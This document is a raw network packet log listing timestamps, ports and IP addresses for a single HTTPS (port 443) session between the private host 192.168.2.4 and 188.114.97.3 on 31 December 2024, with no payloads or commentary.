Dec 31, 2024 08:57:15.438772917 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.438792944 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.438852072 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.438855886 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.438875914 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.457437038 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.457451105 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.457525969 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.457531929 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.469502926 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.469508886 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.469580889 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.469587088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.470016956 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.470033884 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.470088005 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.470092058 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.471551895 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.471569061 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.471671104 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.471677065 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.506392002 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.506406069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.506484985 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.506484985 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.506491899 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.521985054 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.522001982 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.522036076 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.522041082 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.522115946 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.523658037 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.523670912 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.523726940 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.523735046 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.523750067 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.525541067 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.525561094 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.525618076 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.525624037 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.525640011 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.544275045 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.544289112 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.544367075 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.544373035 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.544393063 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.556370974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.556389093 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.556438923 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.556443930 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.556466103 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.556849957 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.556862116 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.556911945 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.556915998 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.556930065 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.559439898 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.559458017 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.559479952 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.559484959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.559515953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.593177080 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.593190908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.593242884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.593249083 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.593269110 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.608688116 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.608706951 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.608740091 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.608747005 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.608791113 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.610522985 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.610536098 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.610579014 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.610586882 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.610599995 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.612369061 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.612392902 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.612452030 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.612457037 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.612488031 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.631109953 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.631124973 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.631226063 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.631231070 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.643100977 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.643119097 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.643150091 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.643156052 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.643191099 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.643599033 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.643613100 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.643699884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.643706083 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.646260023 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.646275997 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.646317005 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.646323919 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.646341085 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.679974079 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.680001974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.680032015 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.680038929 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.680082083 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.695611954 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.695635080 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.695719957 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.695728064 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.697268963 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.697283030 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.697313070 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.697326899 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.697352886 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.699042082 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.699059010 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.699119091 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.699125051 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.699140072 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.717933893 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.717947006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.717992067 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.717998028 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.718023062 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.729877949 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.729896069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.729922056 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.729928970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.729988098 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.730453014 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.730479002 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.730518103 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.730525970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.730537891 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.733242989 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.733262062 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.733428955 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.733434916 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.766798973 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.766813993 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.766865015 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.766876936 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.766899109 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.782386065 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.782403946 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.782450914 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.782458067 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.784034967 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.784046888 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.784138918 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.784145117 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.785799026 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.785815001 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.785844088 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.785850048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.785873890 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.804656982 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.804668903 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.804713964 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.804724932 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.804780960 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.816812038 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.816832066 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.816883087 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.816891909 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.816914082 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.817257881 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.817271948 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.817331076 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.817339897 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.819966078 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.819984913 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.820034027 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.820039988 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.820074081 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.853600979 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.853615046 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.853696108 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.853702068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.869112015 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.869129896 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.869167089 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.869175911 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.869219065 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.870804071 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.870817900 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.870851994 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.870857954 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.870886087 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.872637987 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.872662067 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.872703075 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.872708082 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.872773886 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.891525030 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.891544104 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.891582012 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.891587973 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.891613960 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.903585911 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.903600931 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.903636932 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.903642893 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.903667927 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.904146910 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.904164076 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.904186964 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.904192924 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.904234886 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.906706095 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.906719923 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.906835079 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.906835079 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.906841040 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.940561056 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.940582037 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.940637112 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.940645933 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.940674067 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.955923080 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.955938101 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.955987930 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.955993891 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.956002951 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.957603931 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.957626104 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.957664967 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.957669020 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.957691908 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.959372044 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.959383965 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.959443092 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.959448099 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.978360891 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.978378057 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.978430986 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.978436947 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.978451014 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.990449905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.990463972 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.990525961 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.990531921 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.991017103 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.991034031 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.991061926 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.991070986 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.991101027 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.993607044 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.993622065 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.993659973 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.993664980 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.993690014 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.034442902 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.034461975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.034523964 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.034531116 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.034554958 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.042710066 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.042723894 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.042777061 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.042782068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.044442892 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.044477940 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.044507027 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.044514894 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.044533968 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.046145916 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.046159983 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.046246052 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.046251059 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.068690062 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.068707943 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.068738937 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.068748951 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.068825960 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.077269077 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.077281952 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.077358961 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.077358961 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.077363968 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.077816963 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.077842951 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.077867985 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.077878952 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.077897072 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.080338001 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.080351114 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.080399036 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.080406904 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.121155024 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.121172905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.121217966 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.121227980 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.121334076 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.129542112 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.129554033 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.129650116 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.129650116 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.129656076 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.131145954 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.131165028 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.131200075 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.131205082 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.131241083 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.132944107 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.132957935 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.133035898 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.133042097 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.155426979 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.155447006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.155494928 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.155500889 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.155514956 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.163995981 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.164011002 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.164069891 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.164076090 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.164108038 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.164583921 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.164602041 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.164670944 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.164670944 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.164676905 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.174273014 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.174287081 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.174340963 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.174346924 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.208116055 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.208136082 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.208164930 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.208170891 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.208209991 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.216387987 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.216402054 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.216434002 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.216440916 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.216510057 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.217988968 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.218007088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:16.218044996 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:16.218050957 CET	443	49735	188.114.97.3	192.168.2.4
